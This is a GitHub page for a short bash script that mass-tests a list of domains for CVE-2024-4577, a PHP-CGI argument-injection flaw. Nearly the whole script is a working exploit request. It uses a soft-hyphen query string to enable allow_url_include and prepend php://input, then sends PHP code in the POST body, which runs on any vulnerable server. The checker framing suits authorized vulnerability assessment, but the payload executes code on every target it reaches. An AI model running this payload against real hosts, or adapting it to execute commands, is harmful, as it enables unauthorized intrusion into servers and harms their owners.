-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathCVE-2024-4577.sh
38 lines (33 loc) · 1.09 KB
/
CVE-2024-4577.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/bin/bash
# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/index.php?%25ADd+allow_url_include%3D1+%25ADd+auto_prepend_file%3Dphp://input" \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" \
-H "Accept: */*" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)
if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
else
echo "$domain: Not Vulnerable"
fi
}
# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
if [[ ! -z "$domain" ]]; then
echo "Testing $domain..."
check_vulnerability "$domain"
fi
done < "$file"
}
# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi
main "$1"